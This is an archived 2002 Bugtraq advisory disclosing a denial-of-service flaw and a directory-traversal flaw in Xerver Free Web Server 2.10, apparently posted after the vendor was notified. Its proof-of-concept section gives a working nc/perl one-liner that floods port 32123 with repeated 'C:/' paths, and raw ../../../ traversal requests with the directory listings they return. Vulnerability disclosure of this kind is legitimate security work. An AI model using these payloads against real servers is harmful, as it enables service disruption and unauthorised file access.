[24607] in bugtraq
Xerver-2.10-File-Disclousure&DoS-attack
daemon@ATHENA.MIT.EDU (Alex Hernandez)
Fri Mar 8 20:46:35 2002
Date: Fri, 8 Mar 2002 18:39:39 -0500
Message-Id: <200203082339.SAA11961@www22.ureach.com>
To: bugtraq@securityfocus.com
From: Alex Hernandez <al3xhernandez@ureach.com>
Reply-To: <al3xhernandez@ureach.com>
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
------oOo------
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of
Service
Attack).
------oOo------
Company Affected: www.JavaScript.nu
Version: v2.10
Date Added: 02-27-02
Size: 287 KB
OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL,
MAC ALL.
Author:
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
Also a greet to "KF" <dotslash@snosoft.com>
http://www.snosoft.com for invitme to participate for more
research about the Bugs, Exploits and Vulnerabilities :-)
thanks friend, u have publish exelents bugs :X
----=[Brief Description]=------------
Xerver Free Web Server is a tiny web server allowing you to run
CGI/perl
scripts on
your computer. Xerver includes features such as: Allow/forbid
directory
listing,
create your own error pages ("404 File Not Found"), allow/deny
CGI-scripts, choose
your own index file extensions, share/unshare hidden files or
files with
certain
file extensions, share unlimited folders etc. Xerver is a tiny,
fast and
free web
server, but is still advanced and supports both HTTP/1.1 and
HTTP/1.0
and all HTTP
methods (GET, POST and HEAD)."Run CGI/perl scripts on your
computer.
----=[Summary]=----------------------
Exist two vulnerabilities:
The port 32123 usually is configuration of the server , exist a
one
metod for crass this
system calling the drive C:\ several times, another bug exists
on server
remote any
user can see all the files configuration on the system also
even though
one has formed
the services to deny the folders or files any user can access
via remote
to 80 port
finding the configuration of the own server.
------oOo------
Proof of concept
DoS
http://localhost:32123
$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn
127.0.0.1 32123
Explotation:
Example 1:
$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html
<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
BGCOLOR=white COL
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory
Listing for
/</H2></F
ONT><PRE> <B>File name File
size&nb
sp; Last modified</B>
Program Files
----------------------------------------------------------------
----------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFold
er" BORDER=0> Program Files</A>
----------------------------------------------------------------
----------------
RECYCLER
----------------------------------------------------------------
----------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" B
ORDER=0> RECYCLER</A>
----------------------------------------------------------------
----------------
WINNT
----------------------------------------------------------------
----------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" BORD
ER=0> WINNT</A>
----------------------------------------------------------------
---------------
[...]
or via web:
http://localhost/unix/ALEX/Xerver2.10/../../../
Directory Listing for /
File name File size Last modified
$unix
ALEX
Documents and Settings
My Downloads
Program Files
RECYCLER
[...]
Example 2:
$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0
The results is:
Directory Listing for /WINNT/system32/
File name File size Last
modified
../
AdCache
CatRoot
Com
DTCLog
DirectX
GroupPolicy
Hummbird
IOSUBSYS
Macromed
Microsoft
[...]
------oOo------------------------------------
Vendor Response:
The vendor was notified
"Omid Rouhani" webmaster@javascript.nu
htttp://www.JavaScript.nu
Patch Temporary: Restricted files and Directories
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.
------oOo------------------------------------
________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag
